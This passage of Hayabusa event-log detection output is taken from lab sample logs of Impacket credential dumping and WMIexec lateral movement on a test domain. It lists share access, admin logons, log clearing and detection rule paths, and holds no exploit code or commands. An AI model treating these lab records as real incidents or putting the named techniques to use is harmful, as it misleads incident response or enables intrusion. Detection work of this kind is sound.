5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret 
dump via SMB.evtx" +2021-04-22 18:00:22.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.696 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 20:32:00.171 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63558 : LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63534 : LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 50896 : LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 56740 : LogonID: 
0x189f62,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx +2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.483 +09:00,fs03vuln.offsec.lan,4674,low,Lateral Movement Indicator ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution 
via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.546 +09:00,fs03vuln.offsec.lan,4674,low,Lateral Movement Indicator ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: 
__1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : 
Workstation: : IP Address: 10.23.23.9 : Port: 63564 : LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63565 : 
LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63566 : LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63567 : LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:27.649 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63564 : LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Program Files\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.306 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\DesktopTileResources\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.321 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Downloaded Program Files\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Fonts\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ImmersiveControlPanel\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\media\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.352 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Offline Web Pages\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ToastData\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ar : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\bg : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 
